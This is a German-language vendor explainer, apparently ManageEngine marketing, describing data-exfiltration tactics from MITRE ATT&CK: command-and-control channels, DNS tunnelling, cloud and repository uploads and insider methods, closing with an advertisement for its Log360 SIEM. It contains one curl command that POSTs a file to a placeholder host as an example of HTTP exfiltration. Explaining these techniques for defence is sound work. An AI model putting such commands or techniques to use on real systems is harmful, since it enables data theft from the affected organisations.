Datenexfiltration ist der unbefugte Zugriff auf und das Abrufen von sensiblen Daten mit böswilligen Absichten. Dies kann auch zu gestohlenen und durchgesickerten vertraulichen Informationen und Lösegeldforderungen führen.
Externe Bedrohungsakteure nutzen Methoden wie Phishing, Social Engineering und die Ausnutzung von Webschwachstellen, um das Netzwerk des Opfers anzugreifen und mit Malware zu infizieren. Nachdem sie in das Netzwerk eingedrungen sind, sich durch Persistenz Zugang zu wichtigen Ressourcen verschafft und einen Befehls- und Kontrollkanal eingerichtet haben, beginnen sie mit der Exfiltration von Daten. Verschiedene Tools und Software werden eingesetzt, um das Netzwerk zu scannen, Anmeldeinformationen zu stehlen und Daten zu verschlüsseln und zu komprimieren, bevor sie an externe Server übertragen werden.
Ein Mitarbeiter mit böswilligen Absichten kann Daten viel leichter exfiltrieren, da er sich bereits in der vierten oder fünften Phase der Cyber-Kill-Chain befindet und über die erforderlichen administrativen Berechtigungen oder die Fähigkeit verfügt, seine Berechtigungen nach Bedarf zu erweitern. Insider kennen auch die Sicherheitsrichtlinien des Unternehmens, Schwachstellen und geeignete Optionen für die Exfiltration von Daten, wie das Versenden ausgehender E-Mails, das Hochladen in die Cloud oder das Übertragen auf Wechseldatenträger wie Festplatten und USB-Sticks. Einige können sogar verdeckte Kanäle und ausgefeilte Techniken wie externe Akteure nutzen.
Mitarbeiter, die sich nicht mit den besten Sicherheitspraktiken auskennen, könnten unbeabsichtigt sensible Informationen des Unternehmens preisgeben, indem sie z. B. unsicheres öffentliches WLAN für ihre Arbeit nutzen, riskante Software installieren, Anmeldedaten mit anderen Mitarbeitern austauschen und Daten in unsichere öffentliche Clouds hochladen. Sie werden Opfer von Social Engineering, geben Daten preis und ermöglichen es böswilligen Akteuren, die ersten Phasen der Cyber-Kill-Chain problemlos zu durchlaufen.
Die Datenexfiltration ist eine der 14 Haupttaktiken im ATT&CK-Rahmen. Die unter jeder Taktik definierten Techniken sind eine ständig wachsende Liste, die uns Einblicke in die verdeckten Methoden gibt, die von Bedrohungsakteuren verwendet werden, um die verschiedenen Phasen eines Cyberangriffs zu durchlaufen.
Im Folgenden sind einige der gängigen Techniken aufgeführt, die Angreifer im ATT&CK-Rahmen für die Datenexfiltration verwenden:
Der Befehls- und Kontrollkanal, auch als C2-Kanal bezeichnet, ist die Kommunikationsbrücke zwischen externen Angreifern und dem kompromittierten Netzwerk. Die Malware, mit der das Netzwerk des Opfers infiziert wird, ist mit Anweisungen und Details verschlüsselt, um mehrere externe Server zu erreichen, um zusätzliche Nutzdaten zu erhalten und die gesammelten Daten zu übertragen. Der C2-Datenverkehr wird über häufig genutzte Ports mit dem regulären Benutzerdatenverkehr vermischt, um keinen Verdacht zu erregen. Tools wie Attor, Bankshot und Kessel werden zur Exfiltration von Daten über den C2-Kanal eingesetzt.
Protokolle wie DNS, HTTP, HTTPS und FTP sind ein wesentlicher Bestandteil der Funktionsweise des Internets und des Web-Browsing. Der Anfrage- und Antwortverkehr solcher Protokolle umgeht standardmäßig die meisten Firewalls und wird von Bedrohungsakteuren ausgenutzt. Sie registrieren neue Domänen, richten betrügerische Websites und DNS-Server ein und ziehen die Daten aus dem Netzwerk des Opfers ab, indem sie die Pakete in die Abfragen einbetten. In diesem Fall können Bedrohungsakteure sogar andere Websites hacken, die von den Firewalls des Unternehmens zugelassen sind, um den ausgehenden Datenverkehr zu nutzen.
HTTP: Wenn Benutzer Daten in eine Website eingeben und Dateien über Formulare hochladen, wird die HTTP-Post-Methode verwendet, um diese Daten an den Webserver zu übertragen. Ein Hacker kann mit dieser Methode Daten auf seinen Server exfiltrieren. Dies ist auch sehr praktisch, da das Limit für die Datenübertragung vom Server festgelegt wird. Kommandozeilen-Tools wie cURL und HTTP Prompt werden verwendet, um Daten direkt über Post-Anfragen zu senden.
curl -X POST -F „image=@/downloads/image.gif“ http://URL/postimage.cgi
Im obigen Befehl steht -X für die verwendete HTTP-Methode, -F für das Hochladen eines Formulars und am Ende steht die URL der Website. Es gibt auch andere flexible Optionen, um Daten in verschiedenen Formaten wie JSON und XML zu senden.
DNS-Tunneling: Das DNS-Protokoll löst Domänennamen in IP-Adressen auf, indem es Anfragen hierarchisch an DNS-Server weiterleitet, beginnend mit dem Resolver, dann dem Root-Server, gefolgt vom Top-Level-Domänenserver und schließlich dem autoritativen Namensserver. Um Daten über das DNS-Protokoll zu exfiltrieren, werden die Daten zunächst in kleinere Bits unterteilt. Auf diese Weise kann die Datenübertragungsschwelle (T1030) eingehalten werden. Die Segmente werden dann komprimiert und verschlüsselt.
Die Malware im Netzwerk des Opfers sendet DNS-Anfragen mit den segmentierten Datenpaketen an den vom Hacker eingerichteten autoritativen Namensserver (ANS). Die maximale Größe eines voll qualifizierten Domänennamens (FQDN) beträgt 255 Byte, von denen die 63 Byte, die für die Subdomäne zugewiesen sind, für den Datentransport verwendet werden können. Die zu exfiltrierende(n) Datei(en) wird (werden) mit Hilfe von Kodierungstechniken in Arrays von Zeichenketten umgewandelt und nach und nach an den externen Server gesendet.
Für C2 verwendete DNS-Antworten: Die Domänen verfügen über zugehörige Datensätze wie A (IPV4-Adresse), AAAA (IPV6-Adresse), CNAME (kanonische Namen) und MX (Mail Exchange Server). Wenn diese Datensätze abgefragt werden, kann ein großer Teil der Daten vom ANS als Antwort gesendet werden. Dieser wird als C2-Kanal verwendet, indem die tatsächlichen Datensatzwerte durch Anweisungen an die Malware ersetzt werden.
Neben diesen Protokollen der Anwendungsschicht werden auch Transport- und Sitzungsschichtprotokolle zum Exfiltrieren von Daten verwendet.
Die Mitarbeiter eines Unternehmens können Methoden wie das Kopieren von Dateien auf Wechseldatenträger und Funkkanäle wie Bluetooth verwenden, um Dateien auf ihre eigenen Geräte zu übertragen. Dazu müssen sie das Gerät zunächst vom Unternehmensnetzwerk trennen und eine Verbindung zum mobilen Wi-Fi herstellen. Auf diese Weise lassen sich die Sicherheitsrichtlinien des Unternehmens umgehen.
Sowohl interne als auch externe Bedrohungsakteure können mithilfe von APIs und Befehlszeilentools Daten in Code-Repositories einschleusen. Solche Repositories wie GitHub sind vertrauenswürdig und weit verbreitet, so dass große Datenmengen übertragen werden können, ohne Verdacht zu erregen. Das Gleiche gilt für SasS-Anwendungen und Cloud-Dienste wie Google Drive, Google Docs und Dropbox.
Im Folgenden finden Sie einige proaktive Strategien und Erkennungsmechanismen, die Sie in Ihrem Unternehmen einsetzen können, um Versuche der Datenexfiltration zu erkennen und zu stoppen:
ManageEngine Log360, eine umfassende SIEM-Lösung, kann Ihnen helfen, die oben genannten Strategien und Best Practices zu implementieren und zu automatisieren. Nutzen Sie die fortschrittlichen Funktionen wie Netzwerküberwachung in Echtzeit, Korrelation, integrierte Bedrohungsfeeds, MITRE ATT&CK Dashboard mit vordefinierten Berichten, forensische Analyse von Protokollen, sofortige Alarmierung und Incident Management System, um Datenexfiltrationsversuche effektiv zu erkennen und zu beheben. Informieren Sie sich jetzt über die Lösung.